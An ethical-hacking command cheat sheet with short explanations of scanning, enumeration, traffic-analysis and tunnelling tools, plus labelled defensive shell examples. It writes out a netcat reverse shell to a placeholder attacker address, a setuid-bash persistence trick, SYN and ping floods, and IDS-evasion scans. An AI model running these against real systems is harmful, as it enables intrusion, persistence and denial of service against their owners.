Essential Ethical Hacking Commands Guide

The document provides a list of common hacking and network scanning commands along with brief explanations of their usage. Some commands are used for tasks like reconnaissance, vulnerability scanning, traffic analysis, and covert communication. The list covers tools like Nmap, Masscan, Hping3, and more.
TOP HACKING COMMANDS CHEAT SHEET
ping 192.168.0.1

Sends ICMP echo requests to 192.168.0.1 to check connectivity and measure response time. Used in ethical hacking for initial reconnaissance to verify that the target system is reachable. A host that does not answer is not necessarily down: many firewalls drop ICMP echo, which is why nmap has -Pn (below).

ping -s 1300 172.18.0.11

Sends ICMP echo requests with a 1300-byte payload to 172.18.0.11. It is useful for testing how a network or host handles larger packets, which can reveal misconfigurations or problems related to fragmentation. On Linux, adding -M do sets the don't-fragment bit, so the same command finds the path MTU instead of letting routers fragment silently.

ping -s 1300 -f 172.18.0.11

Sends flood pings with large packets (1300 bytes) to 172.18.0.11. The -f option sends packets as fast as replies come back, or at least 100 per second, and normally requires root. It can be used to stress-test the network components of the target and check for denial-of-service weaknesses.

iftop

Displays bandwidth usage on network interfaces in real time. Ethical hackers use it to monitor network traffic for anomalies that could indicate malicious activity, or to assess the impact of their own testing (a flood ping or SYN flood, for instance) on network bandwidth.

hping3 -S --flood -V -p 80 172.18.0.11

Sends SYN packets to port 80 of 172.18.0.11 as fast as possible (--flood), simulating a SYN flood attack. -S sets the SYN flag, -V enables verbose mode and -p 80 selects the target port. In flood mode hping3 does not wait for or display replies. This command is used for testing the resilience of the target against SYN floods.

hping3 --traceroute -V -1 example.com

Performs a traceroute to example.com using ICMP echo requests (-1 selects ICMP mode) with verbose output (-V). It maps the route packets take to the target and can reveal firewalls, routers and other devices in the path. Because hping3 can do the same in TCP mode (with -S and -p), it often gets past filters that drop the UDP probes of the classic traceroute.

nmap -sL 192.168.1.0/24

Lists every address in 192.168.1.0/24 without scanning any of them. By default nmap still performs a reverse-DNS lookup for each address, so the DNS server sees the list; add -n for a genuinely silent host list. It is used for planning or documentation in large networks, and for checking that a CIDR expands to the range you expect before launching a real scan.

nmap --script vuln 192.168.1.1

Runs the NSE scripts in the "vuln" category against 192.168.1.1. This automated approach helps identify known vulnerabilities that can be exploited. Some of these scripts are intrusive and send exploit-style probes, so treat it as an active test, and verify findings by hand: version-based scripts produce false positives.

nmap --script malware 192.168.1.1

Scans 192.168.1.1 with NSE scripts in the "malware" category, which look for signs of known backdoors and compromised services. It is a quick check for an obviously compromised host, not a substitute for host-based forensics.

nmap -A 192.168.1.1

Performs an aggressive scan on 192.168.1.1 that enables OS detection (-O), version detection (-sV), default script scanning (-sC) and traceroute (--traceroute). It is a comprehensive scan for gathering detailed information about a target, and correspondingly noisy.

nmap -f 192.168.1.0/24

Scans 192.168.1.0/24 with fragmented probe packets (the TCP header is split across small IP fragments), which can evade some IDS/IPS systems that do not reassemble fragments. It is used for stealthier scanning. -f needs raw sockets (root), and many modern inspection devices do reassemble fragments, so test whether it helps rather than assume it does.

nmap --source-port 53 192.168.1.0/24

Scans 192.168.1.0/24 with a source port of 53, mimicking DNS traffic. This can bypass poorly written firewall rules that allow any traffic "from" port 53. It only applies to raw-packet scans such as the default SYN scan; connect scans (-sT), version detection and NSE scripts use normal sockets and ignore it.

nmap -D RND:10 192.168.1.0/24

Scans 192.168.1.0/24 alongside decoy probes spoofed from ten random source addresses (RND:10), so the target's logs show eleven scanners instead of one. This makes it harder, not impossible, to identify the true source: your real address is still among them, and decoys cannot be used for the parts of the scan that need a full TCP handshake (connect scans, version detection). It obscures the scan source rather than anonymising it.

ptunnel

Establishes a tunnel that carries TCP traffic inside ICMP echo requests and replies (a proxy on the outside and a client on the inside). Ethical hackers use it to bypass network restrictions that allow ping but block other traffic, or for covert communication during a penetration test. From the defender's side, unusually large or frequent echo payloads are the tell.

tcpdump -i any icmp

Captures ICMP packets across all network interfaces. This is useful for monitoring and analysing ICMP traffic for suspicious activity such as ping sweeps, network mapping attempts, or ICMP tunnels like the one above.

grep -Hnri 'tree' | vim -

Searches recursively (-r), ignoring case (-i), through all files below the current directory for the string "tree", printing file names (-H) and line numbers (-n). The output is piped into vim (the trailing - tells vim to read standard input) so the hits can be reviewed and pruned in an editor. This is handy for searching code or configuration trees for entries related to a vulnerability or a setting.

:%!sort

Used inside vim, this filters every line of the current buffer (%) through the external sort command (!). It is useful for organising data such as IP addresses or URLs during the analysis phase of an engagement.

:%!grep -v .git

Another vim filter: passes the buffer through grep -v, which inverts the match, dropping lines containing .git. This helps exclude version-control directories from search results such as the grep output above. Unquoted, the dot matches any character, so ".git" also drops lines containing "digit"; escape it as '\.git' when that matters.

masscan -p80,443,22 10.77.14.0/24 --rate=1000

Scans 10.77.14.0/24 for open ports 80, 443 and 22 at 1000 packets per second. Masscan is built for very fast scans over large networks or subnets; it uses its own TCP/IP stack, so it needs root, and it only tells you that a port answered. Write the results in a machine-readable form (-oL or -oJ) and feed the hosts into nmap -sV for service fingerprinting.

masscan 10.0.0.0/8 -p0-65535 --rate=10000

Scans the entire 10.0.0.0/8 range for all 65,536 ports at 10,000 packets per second, demonstrating Masscan's capability for rapid, wide-scale scanning. Do the arithmetic before running it: 2^24 hosts times 65,536 ports is about 1.1 trillion probes, which at this rate takes years, so in practice you narrow the port list or raise the rate to what your uplink and the target's tolerance allow.

masscan -p80,443 10.0.0.0/8 --rate=1000 --randomize-hosts

Scans 10.0.0.0/8 for ports 80 and 443 only, at 1000 packets per second, with the target order randomised. Masscan randomises its target order by default, so the flag mainly documents the intent (it exists for nmap compatibility). Randomising spreads the load so no single subnet sees a burst of probes.

masscan -p23 10.0.0.0/8 --rate=10000

Specifically targets port 23 (Telnet) across 10.0.0.0/8 at a high rate. It is used for quickly identifying potentially vulnerable Telnet services, a cleartext protocol that should not be exposed at all.

sl

A playful command that shows a steam locomotive animation across the terminal. Not hacking-related: it punishes mistyping ls, and by default it ignores Ctrl-C until the train has passed.

alias ls="cat /dev/urandom"

Aliases ls to cat /dev/urandom, so random bytes pour into the terminal whenever ls is typed (random bytes can also garble the terminal state; reset restores it). This is a practical joke rather than a technique, but it is also a reminder that aliases and functions in a user's shell rc files are an easy, easily-missed persistence spot.
nmap -sn 192.168.1.0/24

Performs a host discovery ("ping") scan on 192.168.1.0/24, identifying live hosts without scanning ports. On a local Ethernet segment nmap uses ARP requests for this, which no host firewall can block; across a router it sends an ICMP echo, a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request. It is the basic first step for mapping network structure, and -oG - makes the result easy to parse with grep or awk.

nmap -sV 192.168.1.1

Probes the open ports on 192.168.1.1 to identify service names and versions. This information is crucial for finding vulnerable software versions (which you then look up with searchsploit, below). Banners can be edited, and -sV is noisy: it completes connections and sends protocol-specific probes.

nmap -O 192.168.1.1

Attempts to identify the operating system of 192.168.1.1 from characteristics of its TCP/IP stack behaviour. It needs raw sockets (root) and works best when at least one open and one closed TCP port are found. The result helps tailor further attacks to OS-specific vulnerabilities.

nmap -Pn 192.168.1.1

Scans 192.168.1.1 without host discovery, treating it as up, which is needed when the target blocks ICMP echo and the other discovery probes. It is not stealthier (the port scan itself is unchanged); it avoids missing filtered hosts, at the cost of time spent on addresses that really are down.

whois microsoft.com

Retrieves WHOIS information for microsoft.com, providing details like registration dates, registrar, name servers and, where not redacted by privacy services, ownership and administrative contacts. Used in reconnaissance for gathering intelligence about domain ownership. whois also works on IP addresses and AS numbers, which reveals the netblock a target sits in.

whatweb networkchuck.coffee

Identifies technologies used on the networkchuck.coffee website, such as web server software, CMS, JavaScript libraries and analytics. It is useful for pre-attack planning because it narrows down which software versions to check for known vulnerabilities.
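Both masscan and nmap write output that is meant to be parsed, and chaining them (masscan for breadth, nmap -sV for depth on what it found) is the workflow behind the masscan entries above and the nmap -sn / -sV entries here. The shell functions below are an added example and not part of the original cheat sheet: the masscan list-format (-oL) and nmap grepable-format (-oG) samples are constructed, the addresses are fictitious, and the field layouts described in the comments are what those two tools print.

```sh
#!/bin/sh
# Added example (not from the cheat sheet): turn scanner output into the next
# scan's input. masscan -oL lines look like "open tcp 80 10.77.14.5 1700000000";
# nmap -oG lines are tab-separated "Host: <ip> (<name>)\tStatus: Up" or
# "Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>//<svc>//<version>/, ...".
# Both samples are constructed; the addresses are fictitious.
SAMPLE_MASSCAN='#masscan
open tcp 80 10.77.14.5 1700000000
open tcp 443 10.77.14.5 1700000000
open tcp 22 10.77.14.9 1700000001
open tcp 23 10.77.14.12 1700000001
open tcp 80 10.77.14.12 1700000002
# end'

TAB="$(printf '\t')"
SAMPLE_GNMAP="# Nmap 7.94 scan initiated (constructed sample)
Host: 10.77.14.5 ()${TAB}Status: Up
Host: 10.77.14.7 ()${TAB}Status: Down
Host: 10.77.14.9 ()${TAB}Status: Up
Host: 10.77.14.5 ()${TAB}Ports: 80/open/tcp//http//nginx 1.18.0/, 443/filtered/tcp//https///${TAB}Ignored State: closed (998)
Host: 10.77.14.9 ()${TAB}Ports: 22/open/tcp//ssh//OpenSSH 8.9p1/${TAB}Ignored State: closed (999)
# Nmap done (constructed sample)"

# masscan_hosts_with_port LIST PORT: hosts masscan saw open on one TCP port (23 = Telnet).
masscan_hosts_with_port() {
    printf '%s\n' "$1" | awk -v want="$2" '
        /^#/ { next }
        $1 == "open" && $2 == "tcp" && $3 == want { print $4 }' | LC_ALL=C sort -u
}

# masscan_hosts LIST: every host with at least one open port, ready for nmap -iL.
masscan_hosts() {
    printf '%s\n' "$1" | awk '/^#/ { next } $1 == "open" { print $4 }' | LC_ALL=C sort -u
}

# nmap_up_hosts GNMAP: addresses that nmap -sn -oG reported as Up.
nmap_up_hosts() {
    printf '%s\n' "$1" | awk -F '\t' '
        /^#/ { next }
        $2 == "Status: Up" { h = $1; sub(/^Host: /, "", h); sub(/ .*/, "", h); print h }'
}

# nmap_open_services GNMAP: "host port service version" for each open port in
# -sV -oG output ("-" when nmap had no version). Filtered/closed entries are skipped.
nmap_open_services() {
    printf '%s\n' "$1" | awk -F '\t' '
        /^#/ { next }
        $2 ~ /^Ports: / {
            h = $1; sub(/^Host: /, "", h); sub(/ .*/, "", h)
            n = split(substr($2, 8), entry, /, /)
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                if (f[2] == "open")
                    printf "%s %s %s %s\n", h, f[1], f[5], (f[7] == "" ? "-" : f[7])
            }
        }'
}

# Typical chain: masscan_hosts "$(cat scan.lst)" > targets.txt
#                nmap -sV -iL targets.txt -oG sv.gnmap
echo "Telnet exposed on:"; masscan_hosts_with_port "$SAMPLE_MASSCAN" 23
echo "Live hosts:";        nmap_up_hosts "$SAMPLE_GNMAP"
echo "Services:";          nmap_open_services "$SAMPLE_GNMAP"
```

The grepable format is stable enough to parse this way, but nmap's XML output (-oX) is the supported interface when you need more than host, port, state and version.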
curl -i https://networkchuck.hackwithnahamsec.com

Sends an HTTP GET request to https://networkchuck.hackwithnahamsec.com and prints the response headers (-i) ahead of the body. This is useful for web reconnaissance: the Server and X-Powered-By headers leak software versions, Set-Cookie shows which cookies are issued and whether they carry the Secure, HttpOnly and SameSite attributes, and missing security headers (Content-Security-Policy, Strict-Transport-Security) are findings in themselves.

curl -i https://networkchuck.hackwithnahamsec.com -H 'X-API-TOKEN: <api token>'

Sends the same GET request with a custom X-API-TOKEN header for authentication. This is often used in API testing to confirm that protected endpoints are reachable only with a valid token: repeat the request with the header removed, with a garbage token and with another user's token, and compare the status codes. Tokens passed on the command line end up in shell history and in the process list.

tcpdump -r capture_file.pcap

Reads packets from a pcap file (capture_file.pcap) instead of a live interface, allowing offline analysis of captured traffic. All the usual filter expressions work on the file, so this is how you dig into a specific event or incident after the fact.

tcpdump -i eth0 -c 100

Captures the first 100 packets on eth0 and then exits, limiting the capture to a manageable number of packets for quick analysis or demonstration purposes.
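What to actually look at in a curl -i transcript, as an added example that is not part of the original sheet: the response below is constructed for a fictitious site, and the functions pull out the fingerprinting headers, list the security headers a TLS site should send but does not, and grade each Set-Cookie for the Secure, HttpOnly and SameSite attributes.

```sh
#!/bin/sh
# Added example (not from the cheat sheet): audit what "curl -i" returns.
# The response is constructed to look like a curl -i transcript for a fictitious
# site; real responses use CRLF line endings, which header_block strips.
SAMPLE_RESPONSE='HTTP/1.1 200 OK
Server: nginx/1.18.0
X-Powered-By: PHP/7.4.3
Set-Cookie: session=abc123; Path=/; HttpOnly
Set-Cookie: tracking=xyz; Path=/
Content-Type: text/html

<html><body>hello</body></html>'

# header_block RESPONSE: the header lines only (status line and body dropped, CR removed).
header_block() {
    printf '%s\n' "$1" | tr -d '\r' | awk 'NR == 1 { next } /^$/ { exit } { print }'
}

# header_value RESPONSE NAME: value of the first header called NAME (case-insensitive),
# empty when absent. Fingerprinting headers: Server, X-Powered-By, Via, X-AspNet-Version.
header_value() {
    name="$(printf '%s' "$2" | tr 'A-Z' 'a-z')"
    header_block "$1" | awk -v name="$name" -F ': ' '
        tolower($1) == name { v = $0; sub(/^[^:]*: */, "", v); print v; exit }'
}

# missing_security_headers RESPONSE: headers a TLS site should send but does not.
missing_security_headers() {
    for h in Strict-Transport-Security Content-Security-Policy X-Content-Type-Options X-Frame-Options; do
        [ -n "$(header_value "$1" "$h")" ] || printf '%s\n' "$h"
    done
}

# cookie_findings RESPONSE: one line per Set-Cookie naming the attributes it lacks.
# Without Secure the cookie is also sent over plaintext HTTP; without HttpOnly it is
# readable by injected script; without SameSite it rides along on cross-site requests.
cookie_findings() {
    header_block "$1" | awk -F ': ' '
        tolower($1) == "set-cookie" {
            c = $0; sub(/^[^:]*: */, "", c)
            split(c, kv, "=")
            lc = tolower(c); missing = ""
            if (lc !~ /; *secure/)    missing = missing "Secure,"
            if (lc !~ /; *httponly/)  missing = missing "HttpOnly,"
            if (lc !~ /; *samesite=/) missing = missing "SameSite,"
            sub(/,$/, "", missing)
            print kv[1], (missing == "" ? "ok" : "missing=" missing)
        }'
}

echo "Server: $(header_value "$SAMPLE_RESPONSE" Server)"
echo "Missing security headers:"; missing_security_headers "$SAMPLE_RESPONSE"
echo "Cookies:"; cookie_findings "$SAMPLE_RESPONSE"
```

In practice you would capture the transcript with curl -s -i URL > resp.txt and pass "$(cat resp.txt)" to these functions; the cookie check is only meaningful for an https:// origin, since Secure has nothing to protect on plain HTTP.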
tshark -V -c 1 -i eth0

Captures a single packet on eth0 and prints its full protocol dissection (-V). tshark is the command-line version of Wireshark and gives the same layer-by-layer detail in a terminal, which is what you need on a remote box with no GUI.

nikto -h networkchuck.coffee

Performs a comprehensive web server scan against networkchuck.coffee (nikto takes its target with -h; the original listing omitted the flag) to detect dangerous files, outdated server software and misconfigurations. Nikto is used for web application security testing; it makes thousands of requests and is trivially detected, which is fine in an authorised test.

tshark -Y 'http.request.method == "GET"' -i eth0

Captures on eth0 and shows only packets matching the display filter (-Y): HTTP GET requests. The filter syntax is Wireshark's, so anything you can click on in Wireshark can be expressed here. It is useful for watching web traffic and spotting unexpected or unauthorised requests, in cleartext HTTP only; for HTTPS you see the TLS handshake, not the request.

gobuster dir -u https://networkchuck.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Brute-forces directory and file names on https://networkchuck.com using the given wordlist. Gobuster finds hidden resources that were not meant to be public (backups, admin panels, exposed .git directories). Check how the server answers a request for a name that cannot exist first: if it returns 200 for everything, filter by status code or response size or you get a wordlist's worth of false positives.

timeout

Runs a command with a time limit and kills it if it is still running afterwards (exit status 124 signals that the limit was hit). It keeps long-running tools such as brute-forcers from exceeding a time window, both in scripts and interactively; -k adds a SIGKILL follow-up for tools that ignore SIGTERM.

apt install seclists

Installs the seclists package, a collection of wordlists for security assessments: passwords, usernames, fuzzing payloads, directory and subdomain names. On Kali and Debian-based distributions the lists land under /usr/share/seclists.

tshark -r capture.pcap -qz endpoints,ip

Reads capture.pcap and prints IP endpoint statistics (packets and bytes per address) instead of packet lines (-q suppresses them, -z selects the statistic). This summarises who talked and how much, which is a fast way to spot a scanner, a beaconing host or a data exfiltration channel.

wget https://github.com/danielmiessler/SecLists/raw/master/Discovery/DNS/dns-Jhaddix.txt

Downloads one specific wordlist from the SecLists GitHub repository, a subdomain list used for DNS enumeration. This is the route when you want a single list or the package is unavailable.

tshark -r capture.pcap -q -z follow,tcp,ascii,0

Reassembles TCP stream number 0 (the first conversation in the file) and prints both directions as ASCII, reconstructing the content of the session like Wireshark's "Follow TCP Stream". It is how you read a cleartext login, a downloaded payload or a command-and-control exchange out of a capture.

gobuster dns -d networkchuck.com -w dns-Jhaddix.txt

Conducts DNS subdomain enumeration on networkchuck.com using the dns-Jhaddix.txt wordlist just downloaded (the file name is case-sensitive). Subdomains reveal additional attack surface: staging systems, forgotten services, third-party integrations. Wildcard DNS records make every guess "resolve"; gobuster warns about this, and the results then need filtering.

tshark -e ip.src -e ip.dst -e frame.protocols -T fields -r capture.pcap

Extracts the source IP, destination IP and protocol stack of every packet in capture.pcap as tab-separated fields (-T fields, one -e per field). This is the format to use when you want to post-process traffic with awk, sort and uniq rather than read it.

sublist3r

A tool for fast subdomain enumeration that gathers names from search engines, public websites and DNS data sources rather than querying the target's own servers. It helps uncover additional domains associated with the target for further exploration and vulnerability assessment.
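Field output from tshark (and the tcpdump ICMP capture earlier) becomes useful when something counts it. The following is an added example, not part of the original cheat sheet: the sample lines are constructed as if tshark had been run with -T fields -E separator=, on a capture containing one ping sweep and one port scan, the addresses are fictitious, and the thresholds are arbitrary starting points rather than tuned values.

```sh
#!/bin/sh
# Added example (not from the cheat sheet): simple scan detection over
# "tshark -T fields" output. The sample is constructed as if produced by
#   tshark -r capture.pcap -T fields -E separator=, \
#          -e ip.src -e ip.dst -e frame.protocols -e tcp.dstport
# Addresses are fictitious. tcp.dstport is empty for non-TCP packets.
SAMPLE_FIELDS='10.0.0.5,10.0.0.1,eth:ethertype:ip:icmp,
10.0.0.5,10.0.0.2,eth:ethertype:ip:icmp,
10.0.0.5,10.0.0.3,eth:ethertype:ip:icmp,
10.0.0.5,10.0.0.4,eth:ethertype:ip:icmp,
10.0.0.5,10.0.0.6,eth:ethertype:ip:icmp,
10.0.0.9,10.0.0.20,eth:ethertype:ip:tcp,22
10.0.0.9,10.0.0.20,eth:ethertype:ip:tcp,80
10.0.0.9,10.0.0.20,eth:ethertype:ip:tcp,443
10.0.0.9,10.0.0.20,eth:ethertype:ip:tcp,3389
10.0.0.9,10.0.0.20,eth:ethertype:ip:tcp,8080
10.0.0.9,10.0.0.20,eth:ethertype:ip:tcp,8443
10.0.0.7,10.0.0.20,eth:ethertype:ip:tcp,443
10.0.0.20,10.0.0.7,eth:ethertype:ip:tcp,51514'

# endpoint_summary FIELDS: packets per address, busiest first (what -z endpoints,ip
# gives you, minus the byte counts).
endpoint_summary() {
    printf '%s\n' "$1" | awk -F ',' '
        NF >= 2 { n[$1]++; n[$2]++ }
        END { for (ip in n) print ip, n[ip] }' | LC_ALL=C sort -k2,2nr -k1,1
}

# icmp_sweep_sources FIELDS MIN: sources that sent ICMP to at least MIN distinct
# hosts, the signature of a ping sweep (nmap -sn, fping).
icmp_sweep_sources() {
    printf '%s\n' "$1" | awk -F ',' -v min="$2" '
        $3 ~ /:icmp$/ && !seen[$1 "," $2]++ { dsts[$1]++ }
        END { for (s in dsts) if (dsts[s] >= min) print s, dsts[s] }' | LC_ALL=C sort
}

# port_scan_pairs FIELDS MIN: source>destination pairs where the source touched at
# least MIN distinct TCP ports, the signature of a port scan.
port_scan_pairs() {
    printf '%s\n' "$1" | awk -F ',' -v min="$2" '
        $3 ~ /:tcp$/ && $4 != "" && !seen[$1 "," $2 "," $4]++ { ports[$1 ">" $2]++ }
        END { for (k in ports) if (ports[k] >= min) print k, ports[k] }' | LC_ALL=C sort
}

echo "Top talkers:";       endpoint_summary "$SAMPLE_FIELDS" | head -n 3
echo "Ping sweeps (>=4):"; icmp_sweep_sources "$SAMPLE_FIELDS" 4
echo "Port scans (>=5):";  port_scan_pairs "$SAMPLE_FIELDS" 5
```

Counting distinct destinations and distinct ports, rather than raw packets, is what keeps a chatty but legitimate host from looking like a scanner; a real detector would also window by time and ignore known monitoring hosts.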

tmux

A terminal multiplexer that runs multiple terminal sessions inside a single window and keeps them alive when you detach. Ethical hackers use it to manage several command-line tasks at once and, over SSH, to keep a long scan or a shell running if the connection drops.

wpscan --url chuckkeith.com --enumerate u

Scans the WordPress site at chuckkeith.com and enumerates user accounts (via author pages, the REST API and similar leaks). The usernames feed password attacks and phishing campaigns; enumeration working at all is itself a low-severity finding.

tmux new -s bob

Creates a new tmux session named "bob". Named sessions keep the work on one engagement or one target organised and easy to return to.

wpscan --url chuckkeith.com --enumerate p

Uses WPScan, the WordPress vulnerability scanner, to enumerate installed plugins on chuckkeith.com. Plugins are where most WordPress vulnerabilities live, so this is the list to check against advisories.

tmux a

Attaches to the most recently used tmux session (tmux a -t bob attaches to a specific one). Useful for returning to a previously detached session, for instance after an SSH disconnect.

wpscan --url http://example.com --enumerate vp,vt --plugins-detection aggressive

Runs WPScan against http://example.com enumerating only plugins (vp) and themes (vt) with known vulnerabilities, using aggressive detection, which requests every known plugin path instead of relying on what the pages reference. Aggressive mode finds hidden or inactive components at the cost of far more requests. The vulnerability data comes from the WPScan API and needs an API token for full results.

ssh networkchuck@192.168.1.1

Opens an SSH connection to 192.168.1.1 as the user networkchuck. SSH gives an encrypted, authenticated channel to a host during an assessment and is the usual way to work on an assigned or compromised machine. Verify the host key on first connection: a changed key on a host you have reached before is exactly what a man-in-the-middle looks like.

amass enum -passive -d example.com

Performs passive subdomain enumeration for example.com with Amass, gathering names from public sources (certificate transparency, search engines, passive DNS, web archives) without sending anything to the target's own servers. It reduces the risk of detection and is the usual way to map an external attack surface.

ssh user@remote_host 'command_to_run'

Runs a single command on remote_host as user and returns its output, without an interactive session. This allows ethical hackers to remotely execute commands on a target system as part of exploitation or post-exploitation. ssh joins its arguments into one string that the remote login shell re-parses, so quote the command as a whole, and quote again inside it for anything containing spaces or shell metacharacters.

amass enum -passive -d networkchuck.com

The same passive enumeration for networkchuck.com, collecting data from public sources to identify associated subdomains and IPs without alerting the target. Amass supports many more data sources once configured with API keys, and an active run (without -passive) also resolves and brute-forces names, which does touch the target.

ssh -D 1337 -C -q -N root@172.234.88.97

Connects to 172.234.88.97 as root and opens a dynamic SOCKS proxy on local port 1337 (-D 1337), with compression (-C), in quiet mode (-q) and without running a remote command (-N). Tools that speak SOCKS (curl with --socks5-hostname, browsers, proxychains) then reach whatever the remote host can reach, which is how you pivot into a network behind it during an assessment. It is not anonymous: traffic leaves the remote host with that host's address, and its owner can see it.

git

Refers to using Git for cloning repositories of tools and exploit code. Clone from the project's own repository, read what you are about to run, and prefer a tagged release: repositories of "proof of concept" exploits are a known vector for trojaned code aimed at security researchers.
nc reverse shell

nc -e /bin/sh <attacker_ip> 1234: run on the target, connects out to the attacker's machine on port 1234 and hands it /bin/sh with stdin and stdout attached to the connection. That is what "reverse shell" means: the victim initiates the connection, so it passes through firewalls that only block inbound traffic. The -e option exists in traditional netcat and in ncat, but not in the OpenBSD netcat that Debian and Ubuntu install by default; there you fall back to a named pipe or to a bash /dev/tcp redirection.

nc -lvp 1234: run first on the attacker's machine, listens (-l) verbosely (-v) on port 1234 (-p) and receives the shell (OpenBSD netcat takes the port as a plain argument: nc -lv 1234). The resulting shell has no TTY, so interactive programs and job control misbehave until you upgrade it with a pseudo-terminal, and everything on the link is cleartext, visible to anyone capturing the traffic.

searchsploit

A command-line search tool for the Exploit Database, shipped with Kali and working offline against a local copy of the archive. Ethical hackers use it to find public exploits for the software versions that nmap -sV, whatweb or wpscan identified; searchsploit wordpress plugins or searchsploit ssh narrow the search to a product, and searchsploit -m copies an exploit into the current directory for inspection. Read an exploit before running it: the version in the title is a claim, not a guarantee, and some contain payloads you do not want.

nc simple chat server

nc -lvp 1234: the same listener used as a trivial chat server: whatever each side types is sent to the other. It demonstrates that netcat is just a pipe between a socket and stdin/stdout, which is why it doubles as a file transfer tool, a port checker and a shell carrier.

nc -v <ipaddress> 1234: connects to the listener on <ipaddress> at port 1234, client-server use in its simplest form. Because -v reports whether the connection succeeded, it is also a quick manual port check when nmap is not available.

/bin/bash -p

Starts a new Bash shell in privileged mode (-p), which stops Bash from resetting the effective user and group IDs to the real ones. Without -p, a setuid-root bash immediately drops back to your own privileges; with it, the shell keeps the elevated effective UID. This is the command you run after exploiting a setuid program, or after finding a setuid copy of bash, to actually hold on to root.

sudo chmod +s /bin/bash

Sets the setuid and setgid bits (+s) on /bin/bash, so that any user who executes it gets the file owner's privileges (root), provided they start it with -p. Strictly this is persistence rather than escalation: it needs root (hence sudo) to set up, and what it buys is a way for a low-privileged account to regain root later without sudo. Defenders catch it by listing setuid files and comparing them against a baseline, and by file-integrity monitoring on system directories.

tcpdump -w capture.pcap -i eth0

Captures traffic on eth0 and writes the raw packets to capture.pcap rather than printing them. This is the fundamental step for later analysis with tcpdump -r, tshark or Wireshark, whether to detect anomalies and malicious activity or to keep evidence of what a test actually sent. Add a filter expression to keep the file manageable, and -s 0 on older versions to avoid truncating packets.
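The counterpart to chmod +s /bin/bash and bash -p is the check a defender (or a tester confirming cleanup) runs afterwards. The following is an added example, not part of the original sheet: it builds a throw-away directory tree with one legitimately setuid file and one planted one, lists setuid files under a root, and reports those missing from an allowlist you would capture from a known-good image.

```sh
#!/bin/sh
# Added example (not from the cheat sheet): the defender's check for the
# "chmod +s /bin/bash" trick. It lists setuid files under a root directory and
# reports those not on an allowlist captured from a known-good build. The tree is
# constructed in a temporary directory so the example runs offline; on a real
# host point setuid_files at / (root is needed for some directories; add -xdev
# to the find command to stay on one filesystem).

# make_fixture: build a fake root with one legitimate and one planted setuid file.
make_fixture() {
    root="$(mktemp -d)"
    mkdir -p "$root/bin" "$root/usr/bin"
    for f in bin/bash usr/bin/passwd usr/bin/ls; do
        printf '#!/bin/sh\necho stub\n' > "$root/$f"
        chmod 0755 "$root/$f"
    done
    chmod u+s "$root/usr/bin/passwd"   # setuid on real systems, expected
    chmod u+s "$root/bin/bash"         # the planted backdoor
    printf '%s' "$root"
}

# setuid_files ROOT: regular files under ROOT with the setuid bit, relative to ROOT.
setuid_files() {
    ( cd "$1" && find . -type f -perm -4000 ) | sed 's|^\./||' | LC_ALL=C sort
}

# unexpected_setuid ROOT ALLOWLIST: setuid files not in the space-separated ALLOWLIST.
unexpected_setuid() {
    setuid_files "$1" | while IFS= read -r f; do
        case " $2 " in
            *" $f "*) ;;
            *) printf '%s\n' "$f" ;;
        esac
    done
}

FIX="$(make_fixture)"
echo "setuid files:";    setuid_files "$FIX"
echo "not on baseline:"; unexpected_setuid "$FIX" "usr/bin/passwd usr/bin/sudo"
rm -rf "$FIX"
```

The allowlist is the important part: every distribution ships a handful of setuid binaries, so the signal is a new name (or a known name in the wrong place, such as a second bash under /tmp), not setuid itself.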
